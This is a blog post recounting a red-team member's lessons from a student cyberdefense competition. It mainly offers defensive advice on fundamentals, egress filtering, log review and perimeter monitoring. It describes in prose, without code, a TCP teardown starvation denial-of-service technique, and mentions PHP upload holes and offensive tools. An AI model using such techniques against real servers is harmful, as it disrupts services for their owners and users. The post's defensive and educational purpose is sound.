lessons from a cyberdefense competition red team part 2

This is a 3-part account of my experience on the red team for the ISU CyberDefense Competition. Part 1, Part 2, Part 3

Observations on cyber security
– Web application attacks and web site defacements are fun and tend to gather attention, from attackers and onlookers alike. Sadly, such attacks first of all don’t bring services down, and so don’t penalize teams all the that much. Secondly, they result in little gain for the red team; a short-lived, and very public victory that results in no root access, no further gains, and most likely closed vulnerabilities.

– Network and OS attacks are or have gone out of style, even against systems that have their balls left hanging out into the public network space. Several ripe systems survived a long time while people tinkered with web app vulnerabilities. Beyond nmap scans, I saw very little network twiddling or system/service attacks. This may mean over the next few years, organizational network security and hardening may atrophy as everyone focuses on the web and clients.

– The perimeter is still a battleground, wherever it may be. One team was rumored to be running ipv6 on their inside network, which would have made things interesting for the Red Team had we ever gotten inside that network. Unfortunately, most efforts were spent pounding and poking the external surfaces and not cruising the internal networks. Note that while a web server is part of the perimeter, it has several exposed layers: application, server app, OS. And someone wants to say defense in depth is dead?

– A majority of the time spent by red team members was exploiting holes in the web apps. There were several openings to upload files and execute php code on the web servers. Unfortunately, once these attacks became apparent, such holes were closed and access very limited. Some teams opted to break upload capabilties, others removed such sections from their site, and others were more correct by not allowing specific php executions or overwrites. Some teams left their /etc/passwd file exposed to such attacks, but all cases had shadowed passwords. More defense in depth…

– Doing the fundamentals greatly increases survivability on the Internet. Put up a firewall and make sure your perimeter doesn’t leak information or have excessive holes. Keep patches up to date on systems and services. Change default passwords and accounts. And after those are done, then pay some special attention to the users such services run under, the web applications, and the web servers. I can see why network attacks are being eclipsed by web-based attacks because the ability to secure web apps requires an amazingly huge skill set and experience/knowledge. Do you know how to securely write interactive php apps running on Apache such that they hold up to attacks? That’s a job in itself for more than just one person to administer. Once the fundamentals are taken care of, it really takes a special attacker to make headway into your network. Do they have 0day exploits for your patched services, or the ability to create them? It really does take special skills to do that. I think only at the DefCon CTF competition might there be such expertise in an organized competition. If you get the fundamentals down and your web apps and servers are solid, start changing service banners to really raise the bar for attackers. The fundamentals are money in the pockets of your company.

(A side note, that not every IT person knows the fundamentals, even today. A lot of these students went into this competition missing the fundamentals, and many more will leave the program without a firm grasp of them. LEARN THE FUNDAMENTALS!)

– For the love of God, make an attacker’s life difficult. Make the firewall not respond to closed ports. Make my nmap scan take a long time and throw everything back at me as filtered. Make me earn my scans. Make sure egress on the firewall is strictly configured so even if I do get something planted, it might not be able to call back (and will be exposed in the logs).

– Read the fucking logs. Wow. Once a server is up and running and a service is being used, tail all the logs. The logs will reveal who the attackers are and what they are probing. Especially those web app logs! Typically once a vulnerability is found, the one red team member exclaims his find and the other 14 members of the team clamor over to see it themselves. Suddenly a ton of hits on a seemingly normal part of the site may be cause for alarm. And after an incident does occur, those logs are your survival. You can put a defaced site back up, but it will just get owned again. Check the logs and close the holes, either by changing the code, removing the offending pages, or adjusting server protections to disallow certain things.

– Similar to logs, it can be amazingly insightful to have an outside packet logger or IDS system hanging off the external interface of the perimeter. Even a DoS against the firewall can be detected and seen and diagnosed and fixed with such data. Without this data, a few teams were left wondering why their service seemed down. They looked at the service and box it was running on rather than the firewall on the network.

Coolest attack
The most interesting attack I saw was actually a DoS attack. The attacker called it a reverse LeBrea attack, although it could be called tarpitting a server or FIN starvation attack. In it, the attacker opens hundreds of valid TCP connections and then begins the teardown sequence by sending an ACK/FIN packet. The server responds with an ACK and its own ACK/FIN packet, and then waits for the final ACK response from the attacker. The attacker, however, does not send that ACK packet back, which keeps the server’s connection open. Nicely enough, the server itself is not very busy since it is only waiting for hundreds of open connections to end. This can be eliminated in numerous ways such as detecting DoS attacks and adjusting the firewall to block after a threshold of connections have been made, or by aborting out of TCP teardowns or lowering the wait time. Iptables is susceptible to this unless steps are taken to correct the behavior.

Some false lessons
While lots of lessons and insight can be learned, there are some red herrings and false lessons that hopefully no one takes away.

– Applications are not always secure. Almost every team was running fairly new versions of their applications and systems, from new phpBB and SquirrelMail implementations to new Ubuntu boxes. While it might seem impregnable today, will it be impregnable in a year in a company with poor patch management? Nope. Those little applications like a wiki or phpBB can quickly draw cold sweat on the necks of IT admins…

– While the red team had a lot of talent in one room, I still wouldn’t consider any of them black hat hackers by any means. Most were still students, and only a handful were security professionals. The skillsets only go so far, but the real world can throw any level of skills at you.

– Attacks can still come from within. Pretty much out of scope was social engineering on any scale that would allow unsupervised physical access to systems. Also, attacks on clients such as emailed trojans was not really possible. There really weren’t that many systems on the inside to dupe and gain a foothold. This was more like attacking a standalone DMZ. But don’t forget every system and user is a target.

– DoS attacks are still debilitating and not only can end your night quickly in a competition, but can close a business just as quickly in the real world. And for as debilitating as a DoS attack is, it is typically the least planned-for and one of the harder attacks to thwart, in theory. (Ok, DDoS is harder, just to pre-empt commentors saying it is easy!)

Personal lessons
I’m out of practice. A competition is not the place to fire up Metasploit 3 for the first time (although thankfully I have used Metasploit 2 in the past). Likewise, know general tools to use for basic stuff, and practice them. Domain transfers, nmap scanning, OS/service fingerprinting (both from a scanner but also from just using the services, like Apache running on Ubuntu). I’m rusty on almost everything, so practicing is definitely in order. It’s just one of those things I don’t get to do on a daily basis on the job (or even weekly or monthly!). Know BackTrack tools inside and out. Be familiar with wireless attacks both as an associated client (airpwn, hamster/ferret, rogue AP, MITM) and as an outside attacker (DoS, WEP cracking, IV generation). Knowing these things well up front goes a long way to being an efficient attacker. Just like the defenders, attackers need to know the fundamentals, and practice them regularly. This can lead to less time spent relearning tools or settings, and more time being surgical and more creative. It can also mean less jubilation at low-level triumphs; rather thinking how to leverage those hidden lower triumphs to get the most gain over the long run.

One thought on “lessons from a cyberdefense competition red team part 2

  1. Great post and great series! I especially appreciate your focus on the basics and not on some panacea or current-buzzword-security-solution.

Comments are closed.